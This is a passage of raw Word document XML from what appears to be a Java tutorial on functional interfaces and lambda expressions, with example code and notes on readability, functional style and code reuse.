          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28629473" w14:textId="77777777" w:rsidR="00F40224" w:rsidRPr="00F40224" w:rsidRDefault="00F402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795427"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Using Lambda Expression with Functional Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E5B892" w14:textId="77777777" w:rsidR="00F40224" w:rsidRPr="00F40224" w:rsidRDefault="00F402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795427"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Operation</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>add</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> b</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> b</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Lambda Expression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE6AD1A" w14:textId="77777777" w:rsidR="00F40224" w:rsidRPr="00F40224" w:rsidRDefault="00F402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795427"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>add</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>apply</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Output: 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8BA625" w14:textId="77777777" w:rsidR="00F40224" w:rsidRPr="00F40224" w:rsidRDefault="00F402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795427"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263688F7" w14:textId="6B0744EE" w:rsidR="00F40224" w:rsidRPr="00F40224" w:rsidRDefault="00F402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795427"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72323F77" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D5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Improved Readability and Conciseness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB9A3E8" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95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ambda Expressions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow you to write more compact code. They eliminate the need for boilerplate code that typically comes with anonymous classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D1AF82" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95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Functional interfaces improve the clarity and expressiveness of your code. By passing </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>behavior as a parameter</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or returning it from methods, your code becomes easier to read and understand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F46D8DB" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D5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Supports Functional Programming Paradigms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFA201A" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Java was originally an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>object-oriented</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> language, but with the introduction of functional interfaces and lambda expressions, you can now write more </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional-style code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AE576A" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>higher-order functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (functions that take other functions as parameters or return them) by utilizing functional interfaces. This leads to more </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>immutable</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declarative</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> code, a key feature of functional programming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5C72C6" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D5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Higher-order function):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21ABD3AC" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC"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nctionalInterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E43ABC" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC"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interface Transformer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AE228C" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC"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transform(String input);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58705669" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC"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8AFD628" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CB79878" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC"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FunctionalExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A61088F" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC"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String modifyString(String input, Transformer transformer) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27925567" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC"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transformer.transform(input);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E32922" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC"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CADD997" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24814056" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC"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0D8DEBDA" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC"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sing lambda to pass behavior as a parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189DBE0C" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC"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result = modifyString("Hello", (s) -&gt; s.toUpperCase());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7690A082" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC"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result); // Output: HELLO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256A8660" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC"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2B1E121" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC"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D1650B4" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D5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Code Reusability and Flexibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C22FF8E" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95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y using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can pass behavior around like any other object. This leads to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>more flexible code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, where you can reuse logic across different parts of your program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B2C639" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95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 change the behavior dynamically based on what functional interface implementation is provided.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766B582A" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D5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Reusability):</w:t>
      </w:r>
    </w:p>
